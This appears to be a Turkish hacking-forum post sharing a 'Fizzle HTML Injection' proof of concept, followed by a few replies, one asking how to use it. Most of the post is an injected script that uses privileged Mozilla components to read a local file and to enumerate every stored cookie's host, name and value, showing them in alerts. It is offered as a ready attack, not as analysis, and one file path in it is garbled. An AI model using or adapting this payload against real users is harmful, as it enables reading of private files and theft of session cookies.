Fizzle HTML Injection
-
.RSS desteği olan sitelerde saldırganın cookie çalmasına olanak sağlıyor.
Code :
<script>
function read(readfile)
{
var file = Components.classes["@mozilla.org/file/local;1"]
.createInstance(Components.interfaces.nsILocalFile);
file.initWithPath(readfile);
var is =
Components.classes["@mozilla.org/network/file-input-stream;1"]
.createInstance(Components.interfaces.nsIFileInputStream);
is.init(file, 0x01, 00004, null);
var sis =
Components.classes["@mozilla.org/scriptableinputstream;1"]
.createInstance(Components.interfaces.nsIScriptableInputStream);
sis.init(is);
var output = sis.read(sis.available());
alert(output);
}
read("C: est.txt");
function getCookies()
{
var cookieManager =
Components.classes["@mozilla.org/cookiemanager;1"]
.getService(Components.interfaces.nsICookieManager);
var str = '';
var iter = cookieManager.enumerator;
while (iter.hasMoreElements())
{
var cookie = iter.getNext();
if (cookie instanceof Components.interfaces.nsICookie)
{
str += "Host: " + cookie.host
+ " Name: " + cookie.name
+ " Value: " + cookie.value
+ " ";
}
}
alert(str);
}
getCookies()
</script>
-
peki hocam bunu tam olarak nasıl kullanıyoruz bunu nereye yazıyoruz. ?
-
klasik xss hoja.
-
vaay çok taş olmuş :) isim de ayrı karizma :D
Toplam Hit: 11636 Toplam Mesaj: 4
